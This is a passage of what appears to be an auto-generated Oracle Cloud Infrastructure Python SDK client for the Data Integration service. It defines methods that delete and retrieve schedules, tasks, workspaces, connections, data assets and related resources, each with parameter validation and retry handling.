:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_schedule.py.html>`__ to see an example of how to use delete_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/schedules/{scheduleKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"scheduleKey": schedule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_task(self, workspace_id, task_key, **kwargs):
"""
Removes a task using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_task.py.html>`__ to see an example of how to use delete_task API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_task got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_task_run(self, workspace_id, application_key, task_run_key, **kwargs):
"""
Deletes a task run using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_run_key: (required)
The task run key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_task_run.py.html>`__ to see an example of how to use delete_task_run API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskRuns/{taskRunKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_task_run got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskRunKey": task_run_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_task_schedule(self, workspace_id, application_key, task_schedule_key, **kwargs):
"""
Endpoint to delete TaskSchedule.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_schedule_key: (required)
TaskSchedule Key
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_task_schedule.py.html>`__ to see an example of how to use delete_task_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskSchedules/{taskScheduleKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_task_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskScheduleKey": task_schedule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_task_validation(self, workspace_id, task_validation_key, **kwargs):
"""
Removes a task validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_validation_key: (required)
The task validation key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_task_validation.py.html>`__ to see an example of how to use delete_task_validation API.
"""
resource_path = "/workspaces/{workspaceId}/taskValidations/{taskValidationKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_task_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskValidationKey": task_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_workspace(self, workspace_id, **kwargs):
"""
Deletes a Data Integration workspace resource using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param int quiesce_timeout: (optional)
Used to set the timeout for Data Integration to gracefully close down any running jobs before stopping the workspace.
:param bool is_force_operation: (optional)
Used to force close down the workspace.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_workspace.py.html>`__ to see an example of how to use delete_workspace API.
"""
resource_path = "/workspaces/{workspaceId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"quiesce_timeout",
"is_force_operation",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_workspace got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"quiesceTimeout": kwargs.get("quiesce_timeout", missing),
"isForceOperation": kwargs.get("is_force_operation", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params)
def get_application(self, workspace_id, application_key, **kwargs):
"""
Retrieves an application using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Application`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_application.py.html>`__ to see an example of how to use get_application API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_application got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Application")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Application")
def get_connection(self, workspace_id, connection_key, **kwargs):
"""
Retrieves the connection details using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Connection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_connection.py.html>`__ to see an example of how to use get_connection API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_connection got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Connection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Connection")
def get_connection_validation(self, workspace_id, connection_validation_key, **kwargs):
"""
Retrieves a connection validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str connection_validation_key: (required)
The key of the connection validation.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ConnectionValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_connection_validation.py.html>`__ to see an example of how to use get_connection_validation API.
"""
resource_path = "/workspaces/{workspaceId}/connectionValidations/{connectionValidationKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_connection_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionValidationKey": connection_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ConnectionValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ConnectionValidation")
def get_count_statistic(self, workspace_id, count_statistic_key, **kwargs):
"""
Retrieves statistics on a workspace. It returns an object with an array of property values, such as the number of projects, |
applications, data assets, and so on.
:param str workspace_id: (required)
The workspace ID.
:param str count_statistic_key: (required)
A unique key of the container object, such as workspace, project, and so on, to count statistics for. The statistics is fetched for the given key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.CountStatistic`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_count_statistic.py.html>`__ to see an example of how to use get_count_statistic API.
"""
resource_path = "/workspaces/{workspaceId}/countStatistics/{countStatisticKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_count_statistic got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"countStatisticKey": count_statistic_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="CountStatistic")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="CountStatistic")
def get_data_asset(self, workspace_id, data_asset_key, **kwargs):
"""
Retrieves details of a data asset using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str data_asset_key: (required)
The data asset key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataAsset`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_data_asset.py.html>`__ to see an example of how to use get_data_asset API.
"""
resource_path = "/workspaces/{workspaceId}/dataAssets/{dataAssetKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataAssetKey": data_asset_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataAsset")
def get_data_entity(self, workspace_id, connection_key, schema_resource_name, data_entity_key, **kwargs):
"""
Retrieves the data entity details with the given name from live schema.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str schema_resource_name: (required)
The schema resource name used for retrieving schemas.
:param str data_entity_key: (required)
The key of the data entity.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataEntity`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_data_entity.py.html>`__ to see an example of how to use get_data_entity API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}/schemas/{schemaResourceName}/dataEntities/{dataEntityKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_data_entity got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key,
"schemaResourceName": schema_resource_name,
"dataEntityKey": data_entity_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataEntity")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataEntity")
def get_data_flow(self, workspace_id, data_flow_key, **kwargs):
"""
Retrieves a data flow using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str data_flow_key: (required)
The data flow key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str expand_references: (optional)
Used to expand references of the object. If value is true, then all referenced objects are expanded. If value is false, then shallow objects are returned in place of references. Default is false. <br><br><B>Example:</B><br> <ul> <li><B>?expandReferences=true</B> returns all objects of type data loader task</li> </ul>
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
